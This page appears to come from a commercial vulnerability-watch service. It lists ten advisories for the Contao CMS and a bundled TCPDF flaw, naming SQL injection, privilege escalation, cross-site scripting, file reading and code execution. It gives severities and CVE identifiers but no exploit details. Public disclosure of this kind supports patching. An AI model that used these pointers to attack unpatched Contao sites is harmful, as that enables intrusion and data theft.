The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Contao

vulnerability note CVE-2019-11512

Contao: SQL injection

Synthesis of the vulnerability

An attacker can use a SQL injection of Contao, in order to read or alter data.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading, data creation/edition, data deletion.
Provenance: internet client.
Creation date: 30/04/2019.
Identifiers: CVE-2019-11512, VIGILANCE-VUL-29164.

Description of the vulnerability

An attacker can use a SQL injection of Contao, in order to read or alter data.
The fix for VIGILANCE-VUL-24480 is wrong.
Full Vigil@nce bulletin... (Free trial)

vulnerability alert CVE-2019-10643

Contao: privilege escalation via Opt-in Tokens

Synthesis of the vulnerability

An attacker can bypass restrictions via Opt-in Tokens of Contao, in order to escalate his privileges.
Impacted products: Contao.
Severity: 2/4.
Consequences: administrator access/rights, privileged access/rights.
Provenance: intranet client.
Creation date: 09/04/2019.
Identifiers: CVE-2019-10643, VIGILANCE-VUL-28981.

Description of the vulnerability

An attacker can bypass restrictions via Opt-in Tokens of Contao, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2019-10642

Contao: privilege escalation via Request Token

Synthesis of the vulnerability

An attacker can bypass restrictions via Request Token of Contao, in order to escalate his privileges.
Impacted products: Contao.
Severity: 2/4.
Consequences: privileged access/rights, user access/rights.
Provenance: intranet client.
Creation date: 09/04/2019.
Identifiers: CVE-2019-10642, VIGILANCE-VUL-28980.

Description of the vulnerability

An attacker can bypass restrictions via Request Token of Contao, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability note CVE-2019-10641

Contao: privilege escalation via Valid Session After Password Change

Synthesis of the vulnerability

An attacker can bypass restrictions via Valid Session After Password Change of Contao, in order to escalate his privileges.
Impacted products: Contao.
Severity: 2/4.
Consequences: privileged access/rights, user access/rights.
Provenance: user account.
Creation date: 09/04/2019.
Identifiers: CVE-2019-10641, VIGILANCE-VUL-28979.

Description of the vulnerability

An attacker can bypass restrictions via Valid Session After Password Change of Contao, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability alert CVE-2018-20028

Contao: information disclosure via Back End Users Records View

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via Back End Users Records View of Contao, in order to obtain sensitive information.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading.
Provenance: user account.
Creation date: 14/12/2018.
Identifiers: CVE-2018-20028, VIGILANCE-VUL-28026.

Description of the vulnerability

An attacker can bypass access restrictions to data via Back End Users Records View of Contao, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability CVE-2018-17057

TCPDF: code execution

Synthesis of the vulnerability

An attacker can use a vulnerability of TCPDF, in order to run code.
Impacted products: Contao, Fedora.
Severity: 3/4.
Consequences: user access/rights.
Provenance: document.
Creation date: 18/09/2018.
Identifiers: CVE-2018-17057, FEDORA-2018-187e212568, FEDORA-2018-f1ca41a1a6, VIGILANCE-VUL-27255.

Description of the vulnerability

An attacker can use a vulnerability of TCPDF, in order to run code.
Full Vigil@nce bulletin... (Free trial)

vulnerability alert CVE-2018-10125

Contao: Cross Site Scripting via Back End System Log

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via Back End System Log of Contao, in order to run JavaScript code in the context of the web site.
Impacted products: Contao.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 18/04/2018.
Identifiers: CVE-2018-10125, VIGILANCE-VUL-25911.

Description of the vulnerability

The Contao product offers a web service.

However, it does not filter received data via Back End System Log before inserting them in generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via Back End System Log of Contao, in order to run JavaScript code in the context of the web site.
Full Vigil@nce bulletin... (Free trial)

vulnerability alert CVE-2018-5478

Contao: Cross Site Scripting via newsletter

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via newsletter of Contao, in order to run JavaScript code in the context of the web site.
Impacted products: Contao.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 18/01/2018.
Identifiers: CVE-2018-5478, VIGILANCE-VUL-25111.

Description of the vulnerability

The Contao product offers a web service.

However, it does not filter received data via newsletter before inserting them in generated HTML documents.

An attacker can therefore trigger a Cross Site Scripting via newsletter of Contao, in order to run JavaScript code in the context of the web site.
Full Vigil@nce bulletin... (Free trial)

vulnerability CVE-2017-16558

Contao: SQL injection

Synthesis of the vulnerability

An attacker can use a SQL injection of Contao, in order to read or alter data.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading, data creation/edition, data deletion.
Provenance: internet client.
Creation date: 16/11/2017.
Identifiers: CVE-2017-16558, VIGILANCE-VUL-24480.

Description of the vulnerability

The Contao product uses a database.

However, user's data are directly inserted in a SQL query.

An attacker can therefore use a SQL injection of Contao, in order to read or alter data.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability announce CVE-2017-10993

Contao: file reading via PHP Back End

Synthesis of the vulnerability

A local attacker can read a file via PHP Back End of Contao, in order to obtain sensitive information.
Impacted products: Contao.
Severity: 2/4.
Consequences: data reading.
Provenance: document.
Creation date: 12/07/2017.
Identifiers: CVE-2017-10993, VIGILANCE-VUL-23237.

Description of the vulnerability

A local attacker can read a file via PHP Back End of Contao, in order to obtain sensitive information.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about Contao: